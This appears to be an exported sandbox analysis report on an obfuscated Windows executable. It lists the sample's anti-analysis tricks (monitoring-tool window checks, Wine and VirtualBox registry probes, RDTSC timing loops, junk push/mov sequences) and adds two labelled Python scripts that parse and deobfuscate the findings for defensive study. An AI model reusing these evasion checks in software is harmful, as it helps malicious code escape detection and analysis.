Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1821184 > 1048576
Source: file.exe | Static PE information: Raw size of rkukuayu is bigger than: 0x100000 < 0x1a2c00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkukuayu:EW;uvxbkdjf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkukuayu:EW;uvxbkdjf:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000C6390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c327e should be: 0x1bddd3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: rkukuayu
Source: file.exe | Static PE information: section name: uvxbkdjf
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00314025 push 72908968h; mov dword ptr [esp], eax 0_2_0031404F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00314025 push edx; mov dword ptr [esp], eax 0_2_00314083
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00314025 push ebp; mov dword ptr [esp], eax 0_2_00314091
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00314025 push edx; mov dword ptr [esp], ebp 0_2_003140D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EC865 push 6AE8367Ah; mov dword ptr [esp], edx 0_2_004EC889
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047E868 push eax; mov dword ptr [esp], 3BF5FA94h 0_2_0047EA94
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046B87B push 57FFB460h; mov dword ptr [esp], ecx 0_2_0046B8BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046B87B push 187F613Dh; mov dword ptr [esp], edi 0_2_0046B8DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049B800 push eax; mov dword ptr [esp], ebx 0_2_0049B81F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00564803 push 2DE4992Ah; mov dword ptr [esp], ebx 0_2_00564865
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041F02F push edx; mov dword ptr [esp], ebp 0_2_0041F08F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041F02F push esi; mov dword ptr [esp], ecx 0_2_0041F14E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FA83E push 61A3D531h; mov dword ptr [esp], edi 0_2_004FA86A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FA83E push edi; mov dword ptr [esp], ecx 0_2_004FA883
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046F8C8 push ebp; mov dword ptr [esp], eax 0_2_0046FBA9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C7895 push ecx; ret 0_2_000C78A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309095 push 2C7DCF00h; mov dword ptr [esp], edi 0_2_00309130
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309095 push 3F0F32F7h; mov dword ptr [esp], edi 0_2_00309215
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404095 push 3C4BED4Fh; mov dword ptr [esp], ecx 0_2_00404126
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404095 push 3384DCF4h; mov dword ptr [esp], edx 0_2_0040412E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D60BD push 10E66431h; mov dword ptr [esp], edi 0_2_004D613D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003730CA push 7709C460h; mov dword ptr [esp], ebx 0_2_003730F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003730CA push 57EC1B08h; mov dword ptr [esp], eax 0_2_0037316C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push ebp; mov dword ptr [esp], esp 0_2_0045C95F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push esi; mov dword ptr [esp], 1904DB98h 0_2_0045C9DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push 35B5AD9Ch; mov dword ptr [esp], esi 0_2_0045CA4C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push esi; mov dword ptr [esp], 19D2A7D1h 0_2_0045CA9F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push esi; mov dword ptr [esp], ebp 0_2_0045CAAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push 33A5D37Fh; mov dword ptr [esp], esi 0_2_0045CB1D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push 5E5BDFCBh; mov dword ptr [esp], eax 0_2_0045CB48
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 push 1383EC70h; mov dword ptr [esp], edx 0_2_0045CB71
              Source: file.exeStatic PE information: section name: rkukuayu entropy: 7.955051436363669
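              The "push X; mov dword ptr [esp], Y" pairs listed above are a stack-slot overwrite: the push reserves a slot, the mov immediately overwrites it, so only Y ever reaches the stack and the pushed immediate is junk meant to confuse a linear disassembler (the "push ecx; ret" entry is an indirect jump through ecx written the same way). The Python below, added here as an example and not part of the Joe Sandbox report or of the sample, normalizes these forms back to the single instruction they amount to and also splits the exported lines, which run the instruction text straight into the trailing address. The four input entries are copied from the report; the regular expressions, the function names and the "(esp-4)" notation are the example's own.

```python
import re

REG = r"(e[a-d]x|e[sd]i|e[bs]p)"
IMM = r"([0-9A-Fa-f]+h)"

# Each pattern is a form seen in the report's "Code function" entries.
# "push X; mov dword ptr [esp], Y" overwrites the slot it just pushed, so the
# pair is equivalent to "push Y" and X is junk for the disassembler's benefit.
# "push REG; ret" transfers control to REG: an indirect jump in disguise.
FORMS = [
    (re.compile(rf"^push {IMM}; mov dword ptr \[esp\], {REG}$"), "push {1}"),
    (re.compile(rf"^push {REG}; mov dword ptr \[esp\], {IMM}$"), "push {1}"),
    (re.compile(rf"^push {REG}; mov dword ptr \[esp\], {REG}$"), "push {1}"),
    (re.compile(rf"^push {REG}; ret$"), "jmp {0}"),
]

# The export glues the instruction onto the trailing address ("eax0_2_0031404F").
LINE = re.compile(r"Code function: (\d+_\d+_[0-9A-F]{8}) (.+?)\s*(\d+_\d+_[0-9A-F]{8})$")


def normalize(instr: str) -> str:
    """Collapse one obfuscated sequence into the single instruction it
    amounts to; sequences matching no known form come back unchanged."""
    instr = " ".join(instr.split())
    for pattern, template in FORMS:
        m = pattern.match(instr)
        if m:
            out = template.format(*m.groups())
            # Only esp as the *source* of the mov reaches here as "push esp":
            # the stored value is esp after the push, 4 below what a real
            # "push esp" stores, so say so rather than mislead.
            return "push (esp-4)" if out == "push esp" else out
    return instr


def parse_report_line(line: str):
    """Split a 'Code function' entry into (function start, instruction, instruction address)."""
    m = LINE.search(line)
    if not m:
        return None
    return m.group(1), m.group(2).strip(), m.group(3)


def deobfuscate_listing(lines):
    """Return (instruction address, original text, normalized text) per entry."""
    rows = []
    for line in lines:
        parsed = parse_report_line(line)
        if parsed:
            _, instr, addr = parsed
            rows.append((addr, instr, normalize(instr)))
    return rows


# Four entries copied verbatim from the report above, in the raw export form.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314025 push 72908968h; mov dword ptr [esp], eax0_2_0031404F",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047E868 push eax; mov dword ptr [esp], 3BF5FA94h0_2_0047EA94",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C7895 push ecx; ret 0_2_000C78A8",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push ebp; mov dword ptr [esp], esp0_2_0045C95F",
]

if __name__ == "__main__":
    for addr, original, clean in deobfuscate_listing(REPORT_LINES):
        print(f"{addr}: {original:45} -> {clean}")
```

              The mapping only holds for the exact two-instruction shapes the report lists; if the mov were separated from the push by an instruction that reads [esp], the immediate would be live and the rewrite would be wrong, which is why unmatched text is passed through untouched.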

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_000C6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25897
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
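              Taken together, the entries above are the sample's environment checks: window-class lookups for the Filemon, Process Monitor and Regmon windows (both "RegmonClass" and "Regmonclass" spellings appear), registry opens that only succeed under Wine or on a VirtualBox guest, and a locale check that leads straight to ExitProcess. The Python below is an example added here, not part of the Joe Sandbox report or of the sample: it parses the raw exported lines (which run the source path, the event name and the "Jump to behavior" link text together) and collects the distinct indicators per category, which is the list a sandbox operator needs when renaming tool windows or scrubbing hypervisor strings. The input lines are copied from the report; the event-name list, the category labels and the function names are the example's own.

```python
import re

# Event types that occur in this section of the report; the text export glues
# the source path, the event name and the link text together on one line.
EVENTS = ("Window searched", "File opened", "Evasive API call chain",
          "Code function", "RDTSC instruction interceptor")
LINE = re.compile(
    r"^Source: (?P<src>.+?)(?P<event>" + "|".join(map(re.escape, EVENTS)) +
    r"): (?P<detail>.*?)(?:Jump to behavior|graph_\d+-\d+)?$")


def parse_event(line):
    """Split one exported line into (source, event, detail); None if it is not an event line."""
    m = LINE.match(line.strip())
    if not m:
        return None
    return m.group("src"), m.group("event"), m.group("detail").strip()


def classify(event, detail):
    """Map a parsed event to an (indicator category, value) pair.
    The category names are this example's own, not Joe Sandbox terms."""
    if event == "Window searched" and detail.startswith("window name: "):
        return "window_class", detail[len("window name: "):]
    if event == "File opened" and detail.startswith("HKEY_"):
        return "registry_key", detail
    if event == "Evasive API call chain":
        return "api_chain", " -> ".join(s.strip() for s in detail.split(","))
    return "other", detail


def evasion_profile(lines):
    """Distinct indicators per category with hit counts, in first-seen order."""
    profile = {}
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        _, event, detail = parsed
        category, value = classify(event, detail)
        bucket = profile.setdefault(category, {})
        bucket[value] = bucket.get(value, 0) + 1
    return profile


# Lines copied verbatim from the report above, in the raw export form.
RAW = [
    r"Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25897",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior",
]

if __name__ == "__main__":
    for category, values in evasion_profile(RAW).items():
        print(category)
        for value, hits in values.items():
            print(f"    {value}  (x{hits})")
```

              The two Regmon spellings are kept as separate strings on purpose: the report lists both, and whether they are one check or two is a question for the disassembly, not for the parser.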
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2F0409 second address: 2F040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46C37D second address: 46C39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jbe 00007FB560CBB80Bh 0x0000000d jmp 00007FB560CBB7FFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46ED04 second address: 46ED0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB560E14C36h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46ED0F second address: 46ED19 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB560CBB7FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46EE23 second address: 46EE28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4808D1 second address: 4808D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48D6C1 second address: 48D6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FB560E14C36h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48D6D2 second address: 48D6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48D9C2 second address: 48D9E5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14C36h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB560E14C41h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48D9E5 second address: 48D9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48D9EA second address: 48D9F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DB88 second address: 48DB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DE8A second address: 48DE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DE8E second address: 48DE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DE92 second address: 48DE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DE98 second address: 48DE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DE9E second address: 48DEC2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB560E14C3Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jne 00007FB560E14C36h 0x00000013 pop esi 0x00000014 jbe 00007FB560E14C38h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DEC2 second address: 48DEC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48DEC7 second address: 48DED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007FB560E14C36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48E1A0 second address: 48E1A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48E1A6 second address: 48E1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48E459 second address: 48E467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48E467 second address: 48E4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 ja 00007FB560E14C56h 0x0000000f jmp 00007FB560E14C3Dh 0x00000014 jmp 00007FB560E14C43h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007FB560E14C36h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48E4A1 second address: 48E4B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB560CBB7FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48E4B6 second address: 48E4C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB560E14C3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 482320 second address: 48232A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB560CBB7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48232A second address: 482335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48F2B6 second address: 48F2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB560CBB7FAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48F2C7 second address: 48F2CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 48F59F second address: 48F5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496445 second address: 496449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496449 second address: 49644F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49644F second address: 496455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496455 second address: 496459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 495937 second address: 495941 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB560E14C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 495941 second address: 495951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560E658CCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496AF7 second address: 496AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496AFC second address: 496B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496B02 second address: 496B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496B06 second address: 496B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FB560E658CCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 496B2F second address: 496B44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c je 00007FB560E1BD5Eh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 498AB9 second address: 498ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 453BBC second address: 453BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB560E1BD5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 453BE1 second address: 453BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB560E658C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 453BEB second address: 453C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 453C0F second address: 453C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 453C13 second address: 453C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB560E1BD66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 457182 second address: 457188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49BBB7 second address: 49BBCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB560E1BD62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49BD1F second address: 49BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49BD27 second address: 49BD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB560E1BD56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49BFF2 second address: 49BFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 49C312 second address: 49C31C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB560E1BD56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
